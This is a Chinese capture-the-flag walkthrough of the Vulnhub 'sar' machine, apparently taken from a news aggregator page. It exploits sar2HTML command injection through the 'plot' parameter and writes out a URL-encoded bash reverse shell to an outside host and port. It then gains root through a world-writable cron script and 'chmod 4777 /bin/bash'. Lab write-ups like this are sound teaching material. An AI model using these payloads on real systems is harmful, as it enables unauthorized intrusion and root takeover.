当前位置: 首页 > news >正文

Vulnhub sar

news 2026/6/6 5:31:05

Vulnhub sar

  1. 扫描主机

  1. 扫描端口

  1. 扫描目录

只开了80端口,访问页面,默认的apache2页面

Robots.txt

查询漏洞,版本一致都是远程代码执行漏洞

提供了利用路径 github源码

http://192.168.68.128/sar2HTML/index.php?plot=;whoami

反弹shell

直接用payload没反应,注意url编码

http://192.168.68.128/sar2HTML/index.php?plot=;bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.68.147%2F4242%200%3E%261'

发现sh文件,可能是计划任务执行,查看发现每五分钟执行一次finally.sh

Finally.sh-->write.sh-->touch /tmp/gateway

Write.sh 权限777所有用户可读写

Finally.sh root用户可读写

所以将反弹shell插入write.sh等待计划任务执行即可拿到root的shell

我插入nc的没反弹回来,换下面方式

chmod 4777 /bin/bash

bash -p

http://www.jsqmd.com/news/610461/

相关文章:

  • 车载嵌入式C#开发生死线(CAN总线+UI线程死锁大揭秘):3个被90%团队忽略的实时性陷阱
  • OpenClaw安全实践:Qwen3-14B私有镜像+本地化数据边界方案
  • Carsim与Simulink联合仿真:基于Dugoff轮胎模型与无迹卡尔曼滤波的车辆状态估计...
  • 2026流化床干燥机技术解析:选型、适配与节能改造指南 - 优质品牌商家
  • Python数值计算安全指南:用NumPy和条件判断优雅绕过NoneType错误
  • EEPROM页写机制导致的I2C数据异常解析
  • OpenClaw技能开发入门:为Qwen2.5-VL-7B定制图文处理模块
  • 从 0 到 1 搭建美股回测数据体系:API 获取 + 清洗 + 校验完整方案
  • C# 13 unsafe上下文管控实战手册(.NET 8.0.3+强制合规清单)
  • 从零到链:以太坊DApp开发实战指南
  • 【GUI-Agent】阶跃星辰 GUI-MCP 解读---()---命令解析和工具映射蓉
  • 半导体供应链行业展会推荐:优质半导体供应链行业展一站式指南 - 品牌2026
  • Prism框架在WPF中的5个实战技巧:从模块化到MVVM的完整指南
  • M5GFX嵌入式图形库:面向M5Stack的HAL解耦GUI引擎
  • 2026四川健身房专用地板标杆名录:性能与服务双维度解析 - 优质品牌商家
  • 【2026年最新600套毕设项目分享】基于微信小程序的老孙电子点菜系统(30005)
  • Windows热键侦探:3步快速找出谁“偷“了你的快捷键
  • OpenClaw模型微调入门:Qwen3.5-9B定制化图片识别实战
  • 苍穹外卖套餐管理核心表解析:setmeal_dish关联查询的5个关键实现细节
  • MATLAB代码:储能联合调峰调频优化模型
  • 2026年质量好的滤筒除尘器/布袋除尘器稳定供货厂家推荐 - 行业平台推荐
  • 2026年活动会议核心知识,助力活动高效落地
  • PDE (Processing D Editor) 三维场景编辑器 · 软件白皮书 · 基于 v..曝
  • 上周面试了个38岁程序员,简历普通技术也不突出,聊到最后他说了一句话,我当场给了通过,这句话值得所有人听听
  • 利用Cesium后处理技术实现Shadertoy特效的跨平台移植
  • 别再死记硬背公式了!用Excel表格搞定反激变压器CCM/DCM模式参数计算(附模板下载)
  • OpenClaw技能扩展实战:用gemma-3-12b-it自动处理Markdown文档
  • 下一代人工智能技术:从大语言模型(LLM)到世界模型(WM)
  • 国科大计算机体系结构期末考试实战指南——从晶体管到TLB的深度解析
  • 汽车电子开发必备:3分钟搞定S19转HEX文件(附HexView详细操作截图)